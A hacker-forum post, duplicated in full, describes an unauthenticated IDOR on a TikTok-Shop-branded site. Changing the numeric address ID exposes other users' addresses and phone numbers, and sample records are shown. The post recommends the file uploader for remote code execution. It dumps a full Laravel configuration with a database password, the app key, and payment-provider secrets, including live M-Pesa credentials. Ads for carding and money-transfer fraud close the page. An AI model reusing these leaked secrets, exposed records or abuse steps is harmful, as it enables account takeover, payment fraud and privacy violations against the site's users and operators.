[Image: tiktok-logo-9.png]
Hello again, greetings from kelvinsecurity to the community, today I come to clarify a mechanism for executing the vulnerability for the disclosure of information from tiktok shop users around a separate domain.
Victim:
[Image: 1.png]
- [email protected]
- tiktokshopin.com
-
- TikTok, 10100 Venice Bivd, Culver City, CA 90232
what was tried?
1 - disclose user information
2 - get an RCE through the uploader skipping the permissions around laravel technology
Proof of concept:
1 - using burp suite and only the basic tools of search engines for code inspection and network interception, it was possible to identify weak points that could allow the disclosure of user information, perhaps some type of IDOR or RCE in case we are successful.
This will be easy since I will not give step by step details of how to obtain the information this will be fast.
identify: /addresses/417/edit
As you can see, it has an ID that represents the number in which the person's address was registered.
now we can use it as lower or higher numbers.
[Image: admin.png]
Example Results:
[Image: sar.png]
to abuse this filter do not require authentication:
-
Quote:
{"data":{"address_data":{"id":400,"user_id":597,"address":"9243 Ansley Street Apt. 503\nWest Estella, HI 77176-5966","country_id":101,"state_id":16,"city_id":1404,"longitude":null,"latitude":null,"postal_code":"53267-7787","phone":"+8885235414050","set_default":0,"created_at":"2022-07-25T02:01:00.000000Z","updated_at":"2022-07-25T02:01:00.000000Z"
Quote:
{"data":{"address_data":{"id":401,"user_id":598,"address":"704 Aida Inlet\nPort Ralph, AL 71689-8221","country_id":212,"state_id":3424,"city_id":39227,"longitude":null,"latitude":null,"postal_code":"14009-6373","phone":"+1901207022226","set_default":0,"created_at":"2022-07-25T02:01:00.000000Z","updated_at":"2022-07-25T02:01:00.000000Z"},"states":[],"cities":[]}
if you want to test the RCE in the future I recommend using the uploader
[Image: shell.png]
Config Laravel:
Quote:
DB_CONNECTION=mysql
DB_HOST="localhost"
DB_PORT="3306"
DB_DATABASE="tiktokshop_ink"
DB_USERNAME="tiktokshop_ink"
DB_PASSWORD="R3K2waE2iWAf6SXn"
BROADCAST_DRIVER=log
CACHE_DRIVER="file"
QUEUE_CONNECTION=redis
SESSION_DRIVER="file"
SESSION_LIFETIME=120
APP_NAME="TikTok Shop"
APP_ENV=local
APP_KEY=base64:WrvqXJ+ilWOLItqI7C2N2R2dQkqFAHFYzTrQBBJqtso=
APP_DEBUG=false
APP_URL="https://www.tiktok-store-center.com/"
APP_TIMEZONE="Asia/Tokyo"
NGENIUS_OUTLET_ID="765effa3-68d9-4a61-9273-b43261a0c223"
NGENIUS_API_KEY="OGQyYmY3YWQtYzFiMS00ODljLWEyZDQtZTM5ZWIyYTc4NTcxOjkxMjVkMzNmLWU5YjItNDFlNy05Y2JlLWUwNDEyMGViNDM1YQ=="
NGENIUS_CURRENCY="AED"
FCM_SERVER_KEY="AAAAeupjf6Y:APA91bGkdJGl-l4RxR4anWu1Oix1ufAnUao5ZGvaM1UQXarBZFsHhYhjnOc1MT5prUaenXy91pNMjgmJDuY1KYYAjP_Dy-7uYvegY1C-_IwY6rbJSzr1xcg0T3eQwsrw5ouET4fKglnK"
MAP_API_KEY="AIzaSyC9x8mCn5-P8XUl59uGqwmmcU6Alt1qza8"
FLW_PUBLIC_KEY="FLWPUBK_TEST-1b5be32a4d8ca4de29969f3cb52b9c3b-X"
FLW_SECRET_KEY="FLWSECK_TEST-68a59d51527ec4e922ce39b431b22e2b-X"
FLW_SECRET_HASH="FLWSECK_TESTeda501fdda9f"
PAYKU_BASE_URL="https://des.payku.cl/api"
PAYKU_PUBLIC_TOKEN="tkpu6858fef1b75832c63d84cf1551f1"
PAYKU_PRIVATE_TOKEN="tkpi8a0b5ca0a8af71a62d12d481fc61"
MPESA_CONSUMER_KEY="AhVBxJor4KtkTngBPzewNHKlkAAWBsbS"
MPESA_CONSUMER_SECRET="mG7dyhLHl0uNBxK0"
MPESA_SHORT_CODE="4082533"
MPESA_USERNAME="Order N Get"
MPESA_PASSWORD="Muktar1097#"
MPESA_PASSKEY="355119ac2483abbbc57e46b19c0722a320595a9b244a1aa0412372dc09f5634e"
MPESA_ENV="live"
IYZICO_API_KEY="sandbox-1GcasNxaRSuHuxbK1aD67VSSpS2xPE9o"
IYZICO_SECRET_KEY="sandbox-j7X6sWA2B8qhN6wwyYGbxYYf5JCliceu"
PROXYPAY_TOKEN="im5lqr34fwt37vougnpe4nuizu6exzlf"
PROXYPAY_ENTITY="99923"
thanks
Hello again, greetings from kelvinsecurity to the community, today I come to clarify a mechanism for executing the vulnerability for the disclosure of information from tiktok shop users around a separate domain.
Victim:
[Image: 1.png]
- [email protected]
- tiktokshopin.com
-
- TikTok, 10100 Venice Bivd, Culver City, CA 90232
what was tried?
1 - disclose user information
2 - get an RCE through the uploader skipping the permissions around laravel technology
Proof of concept:
1 - using burp suite and only the basic tools of search engines for code inspection and network interception, it was possible to identify weak points that could allow the disclosure of user information, perhaps some type of IDOR or RCE in case we are successful.
This will be easy since I will not give step by step details of how to obtain the information this will be fast.
identify: /addresses/417/edit
As you can see, it has an ID that represents the number in which the person's address was registered.
now we can use it as lower or higher numbers.
[Image: admin.png]
Example Results:
[Image: sar.png]
to abuse this filter do not require authentication:
-
Quote:
{"data":{"address_data":{"id":400,"user_id":597,"address":"9243 Ansley Street Apt. 503\nWest Estella, HI 77176-5966","country_id":101,"state_id":16,"city_id":1404,"longitude":null,"latitude":null,"postal_code":"53267-7787","phone":"+8885235414050","set_default":0,"created_at":"2022-07-25T02:01:00.000000Z","updated_at":"2022-07-25T02:01:00.000000Z"
Quote:
{"data":{"address_data":{"id":401,"user_id":598,"address":"704 Aida Inlet\nPort Ralph, AL 71689-8221","country_id":212,"state_id":3424,"city_id":39227,"longitude":null,"latitude":null,"postal_code":"14009-6373","phone":"+1901207022226","set_default":0,"created_at":"2022-07-25T02:01:00.000000Z","updated_at":"2022-07-25T02:01:00.000000Z"},"states":[],"cities":[]}
if you want to test the RCE in the future I recommend using the uploader
[Image: shell.png]
Config Laravel:
Quote:
DB_CONNECTION=mysql
DB_HOST="localhost"
DB_PORT="3306"
DB_DATABASE="tiktokshop_ink"
DB_USERNAME="tiktokshop_ink"
DB_PASSWORD="R3K2waE2iWAf6SXn"
BROADCAST_DRIVER=log
CACHE_DRIVER="file"
QUEUE_CONNECTION=redis
SESSION_DRIVER="file"
SESSION_LIFETIME=120
APP_NAME="TikTok Shop"
APP_ENV=local
APP_KEY=base64:WrvqXJ+ilWOLItqI7C2N2R2dQkqFAHFYzTrQBBJqtso=
APP_DEBUG=false
APP_URL="https://www.tiktok-store-center.com/"
APP_TIMEZONE="Asia/Tokyo"
NGENIUS_OUTLET_ID="765effa3-68d9-4a61-9273-b43261a0c223"
NGENIUS_API_KEY="OGQyYmY3YWQtYzFiMS00ODljLWEyZDQtZTM5ZWIyYTc4NTcxOjkxMjVkMzNmLWU5YjItNDFlNy05Y2JlLWUwNDEyMGViNDM1YQ=="
NGENIUS_CURRENCY="AED"
FCM_SERVER_KEY="AAAAeupjf6Y:APA91bGkdJGl-l4RxR4anWu1Oix1ufAnUao5ZGvaM1UQXarBZFsHhYhjnOc1MT5prUaenXy91pNMjgmJDuY1KYYAjP_Dy-7uYvegY1C-_IwY6rbJSzr1xcg0T3eQwsrw5ouET4fKglnK"
MAP_API_KEY="AIzaSyC9x8mCn5-P8XUl59uGqwmmcU6Alt1qza8"
FLW_PUBLIC_KEY="FLWPUBK_TEST-1b5be32a4d8ca4de29969f3cb52b9c3b-X"
FLW_SECRET_KEY="FLWSECK_TEST-68a59d51527ec4e922ce39b431b22e2b-X"
FLW_SECRET_HASH="FLWSECK_TESTeda501fdda9f"
PAYKU_BASE_URL="https://des.payku.cl/api"
PAYKU_PUBLIC_TOKEN="tkpu6858fef1b75832c63d84cf1551f1"
PAYKU_PRIVATE_TOKEN="tkpi8a0b5ca0a8af71a62d12d481fc61"
MPESA_CONSUMER_KEY="AhVBxJor4KtkTngBPzewNHKlkAAWBsbS"
MPESA_CONSUMER_SECRET="mG7dyhLHl0uNBxK0"
MPESA_SHORT_CODE="4082533"
MPESA_USERNAME="Order N Get"
MPESA_PASSWORD="Muktar1097#"
MPESA_PASSKEY="355119ac2483abbbc57e46b19c0722a320595a9b244a1aa0412372dc09f5634e"
MPESA_ENV="live"
IYZICO_API_KEY="sandbox-1GcasNxaRSuHuxbK1aD67VSSpS2xPE9o"
IYZICO_SECRET_KEY="sandbox-j7X6sWA2B8qhN6wwyYGbxYYf5JCliceu"
PROXYPAY_TOKEN="im5lqr34fwt37vougnpe4nuizu6exzlf"
PROXYPAY_ENTITY="99923"
thanks
Verified & Trusted WesternUnion | MoneyGram | Bank - Transferring [299$ BTC for 2000$ WU]
Verified & Trusted Electronics Carding, Carding iPhone, Samsung Carding, MacBook Carding, Laptops Carding